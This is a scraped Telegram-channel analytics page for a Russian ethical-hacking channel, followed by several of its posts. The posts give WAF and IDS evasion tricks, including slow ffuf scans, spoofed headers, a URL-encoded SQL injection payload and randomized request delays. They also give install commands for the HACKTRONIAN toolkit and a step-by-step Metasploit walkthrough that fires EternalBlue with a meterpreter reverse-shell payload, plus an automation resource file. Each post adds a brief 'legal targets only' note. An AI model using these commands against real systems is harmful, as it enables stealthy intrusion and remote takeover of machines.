CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
إظهار المزيد📈 نظرة تحليلية على قناة تيليجرام CodeGuard: CyberSec Edition
تُعد قناة CodeGuard: CyberSec Edition لاعباً نشطاً. يضم المجتمع حالياً 12 639 مشتركاً، محتلاً المرتبة 10 058 في فئة التكنولوجيات والتطبيقات والمرتبة 52 296 في منطقة روسيا.
📊 مؤشرات الجمهور والحراك
منذ تأسيسه في невідомо، حقق المشروع نمواً سريعاً وجمع 12 639 مشتركاً.
بحسب آخر البيانات بتاريخ 22 يونيو, 2026، تحافظ القناة على نشاط مستقر. خلال آخر 30 يوماً تغيّر عدد الأعضاء بمقدار 614، وفي آخر 24 ساعة بمقدار 96، مع بقاء الوصول العام مرتفعاً.
- حالة التحقق: غير موثّقة
- معدل التفاعل (ER): يبلغ متوسط تفاعل الجمهور 12.48%. وخلال أول 24 ساعة من النشر يحصد المحتوى عادةً 6.78% من ردود الفعل نسبةً إلى إجمالي المشتركين.
- وصول المنشورات: يحصل كل منشور على متوسط 1 577 مشاهدة. وخلال اليوم الأول يجمع عادةً 857 مشاهدة.
- التفاعلات والاستجابة: يتفاعل الجمهور بانتظام؛ متوسط التفاعلات لكل منشور يبلغ 4.
- الاهتمامات الموضوعية: يركز المحتوى على مواضيع رئيسية مثل codeguard, pysec, docker, grep, контейнер.
📝 الوصف وسياسة المحتوى
يصف المؤلف القناة بأنها مساحة للتعبير عن الآراء الذاتية:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
بفضل وتيرة التحديث المرتفعة (أحدث البيانات بتاريخ 23 يونيو, 2026) تحافظ القناة على حداثتها ومستوى وصول مرتفع. وتُظهر التحليلات تفاعلاً نشطاً من الجمهور، ما يجعلها نقطة تأثير مهمة ضمن فئة التكنولوجيات والتطبيقات.
wafw00f https://target.com
*Быстрый сканер, который скажет, защищён ли сайт и каким WAF.*
2. Медленные и тихие сканы на `ffuf`
Стандартные сканеры палят тебя моментально. Забивай на скорость, ставь паузы и делай всё тихо:
ffuf -w /usr/share/wordlists/dirb/common.txt -u https://target.com/FUZZ -p 0.5 -t 10 -o ffuf_results.json
- -p 0.5 — полсекунды между запросами, чтобы не злить WAF/IDS
- -t 10 — не больше 10 потоков, меньше шума
3. Меняем заголовки, чтобы быть незаметным
WAF фильтрует по User-Agent и другим заголовкам — меняй их:
curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" https://target.com/path
curl -H "X-Forwarded-For: 127.0.0.1" https://target.com/path
Используй прокси и VPN, чтобы сменить IP и не светиться.
4. Кодируем ходы, чтобы сбить алгоритм
Пример с URL-кодированием полезной нагрузки:
curl "https://target.com/search?q=%27%20OR%201=1--"
Так SQL-инъекция выглядит неочевидно для WAF.
5. Медленные циклы с рандомной задержкой
Для обхода IDS:
for url in $(cat urls.txt); do
curl -A "Mozilla/5.0" "$url"
sleep $((RANDOM % 5 + 1)) # пауза случайно от 1 до 5 секунд
done
Медленный и нерегулярный трафик сложнее детектировать.
⚠️ Важно: Все инструменты запускай только на легальных целях и с разрешения владельца.
😈 CodeGuard | #pentest #WAF #OSINT #hackingtoolsgit clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x install.sh
sudo ./install.sh
hacktronian
Для Android (Termux):
pkg install git python
git clone https://github.com/thehackingsage/hacktronian.git
cd hacktronian
chmod +x hacktronian.py
python2 hacktronian.py
📱 Есть подробный видеоруководство на YouTube для быстрого старта.
💡 Советы:
- Используй HACKTRONIAN как единый центр для запуска известных инструментов, экономя время.
- Комбинируй методы сбора информации и эксплуатации для максимальной эффективности.
- Постоянно обновляй и расширяй свои навыки с помощью этого набора.
😈 CodeGuard | #HACKTRONIAN #hackingtoolsВ этой статье Сергей — наш эксперт, который прошел путь от сисадмина до администратора средств защиты и, наконец, пентестера расскажет, где автоматизация незаменима, а где без человеческого мозга не обойтись. Пройдем по всем этапам пентеста от разведки до написания отчета, и посмотрим, как грамотно сочетать силу машин с интуицией специалиста.👩💻 Можете глянуть оригинал 😈 CodeGuard | #cybersecurity
curl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfinstall > msfinstall
# Загружаем официальный скрипт установки Metasploit с GitHub и сохраняем его в файл msfinstall
chmod +x msfinstall
# Делаем скрипт исполняемым (разрешаем запуск)
sudo ./msfinstall
# Запускаем скрипт с правами суперпользователя для установки Metasploit на систему
2. Запуск консоли Metasploit
msfconsole
# Запускаем Metasploit в интерактивном режиме — консоль откроется и готова к командам
3. Поиск подходящего эксплойта
search smb
# Ищем все эксплойты и модули, в названии или описании которых есть "smb" — часто используется в атаках на протокол SMB (например, EternalBlue)
4. Выбор эксплойта для работы
use exploit/windows/smb/ms17_010_eternalblue
# Загружаем модуль EternalBlue — один из самых известных эксплойтов для уязвимости в SMB
5. Просмотр и настройка параметров
show options
# Показываем список необходимых параметров для эксплойта — куда нужно указать цели, параметры для подключения и прочее
6. Установка IP и порта цели
set RHOST 192.168.1.100
# RHOST — IP адрес устройства жертвы, куда нацелена атака
set RPORT 445
# RPORT — порт для подключения (445 — стандартный порт SMB)
7. Настройка полезной нагрузки (payload) и параметров обратного подключения
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Payload — что именно будет выполнено после успешного взлома. Meterpreter — мощная оболочка для управления системой.
set LHOST 192.168.1.50
# LHOST — твой локальный IP-адрес, чтобы жертва могла "позвонить" тебе обратно (обратное TCP-соединение)
set LPORT 4444
# LPORT — порт, на который будет установлен обратный канал связи
8. Запуск эксплойта
exploit
# Запускаем атаку, Metasploit пытается использовать эксплойт и payload для получения доступа
9. Работа с открытыми сессиями
sessions
# Показывает список открытых сессий — активных подключений к "взломанным" машинам
10. Подключение к сессии
sessions -i 1
# Подключаемся к сессии с номером 1 для интерактивного управления удалённой системой
11. Выполнение команд в shell
shell
# Запускаем системный shell удалённого устройства – теперь можно выполнять команды, как будто ты физически работаешь на той машине
ls -la
# Команда списка файлов и папок с подробной информацией — пример простой команды для проверки доступа
12. Автоматизация через resource-файл
Создаём файл auto.rc с содержимым:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set RPORT 445
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit
Запуск:
msfconsole -r auto.rc
# Запускаем msfconsole и сразу подгружаем команды из файла auto.rc — автоматизируем весь процесс и не вводим всё вручную
Важные советы для новичков
- Всегда запускай Metasploit на легальных целях и с разрешения владельцев.
- Перед тестом изучай публичные уязвимости и документацию выбранного модуля.
- Используй help и info для подробной информации о командах и эксплойтах.
- Meterpreter-сессии дают огромные возможности — от запуска команд до снятия скриншотов.
- Постепенно изучай post-exploitation модули для расширения контроля над системой.
🤔 Этот мини-гайд — базовый старт для погружения в Metasploit.
ставь реакцию 👍 и поделись постом с другом
😈 CodeGuard | #Metasploit #hackingtools💀 Linux глазами хакера Автор: Михаил Фленов Год издания: 2021Книга, если ты хочешь не просто использовать Linux, а понимать, как он работает изнутри — эта книга станет твоим главным руководством. Не про "как поставить систему". Про как сделать её безопасной, производительной и защищённой. 🧠Что внутри? - Базовое администрирование и управление доступом - Настройка Firewall и защита от атак - Настройка серверов: WEB, FTP, Proxy, DNS - Программы для электронной почты и файлообмена - Политика мониторинга и архивирования данных - Потенциальные уязвимости и как их избежать - Что делать при атаке или взломе — восстановление и предотвращение потери данных - Тестирование безопасности конфигурации (обновлённая информация для Ubuntu) 📌 В шестом издании — актуальная информация и новые инструменты для проверки безопасности. 🔝 Подходит: - Администраторам Linux - Специалистам по безопасности - Тем, кто хочет **понимать, как работает система, а не просто запускать команды** - Всем, кто хочет **строить безопасную и надёжную инфраструктуру** Безопасность начинается с понимания: - Как работают процессы в Linux - Как устроены права доступа - Какие службы могут быть уязвимы - Как защитить систему от реальных атак 📌 Эта книга — не про взлом ради взлома. Она про мышление защитника, который знает, как устроена система, чтобы не дать ей быть сломанной. 💠 Бери книгу → [Archive] 😈 CodeGuard | #book #linux #security
متاح الآن! بحث تيليغرام 2025 — أهم رؤى العام 
